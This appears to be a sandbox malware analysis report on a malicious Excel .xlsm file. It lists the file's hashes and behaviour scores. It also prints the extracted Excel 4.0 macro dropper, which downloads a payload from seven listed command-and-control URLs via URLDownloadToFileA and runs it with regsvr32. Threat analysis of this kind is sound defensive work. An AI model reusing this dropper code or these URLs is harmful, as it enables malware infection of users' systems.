Overview

overview

10

Static

static

10

63f8b96bcc...1.xlsm

windows7-x64

10

63f8b96bcc...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1

  • Size

    38KB

  • Sample

    241121-a9b8xs1rbm

  • MD5

    ffbe9c5409f366da195e5f9e887ac4c8

  • SHA1

    50036cb05319165c87ca76afee0762b1c5d78634

  • SHA256

    63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1

  • SHA512

    afc85414078ad52acabd86a621afdab42635effcb5f1e49923b234c11e0e39e07efa5f121b61f0c3b327b359a0132cc590e2e2ebcc6d4eb467863d0bcc058ee7

  • SSDEEP

    768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
xlm40.dropper

https://damjangro.org/data/IlBcH2mM/
xlm40.dropper

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

Targets

    • Target

      63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1

    • Size

      38KB

    • MD5

      ffbe9c5409f366da195e5f9e887ac4c8

    • SHA1

      50036cb05319165c87ca76afee0762b1c5d78634

    • SHA256

      63f8b96bcc668ff9898553cb332fa8d2c18d90f8e386d71a1684429d6e483fa1

    • SHA512

      afc85414078ad52acabd86a621afdab42635effcb5f1e49923b234c11e0e39e07efa5f121b61f0c3b327b359a0132cc590e2e2ebcc6d4eb467863d0bcc058ee7

    • SSDEEP

      768:6mcXd/GCR8tijOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFs:6mqTeSOZZ1ZYpoQ/pMAeVIyTCR

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks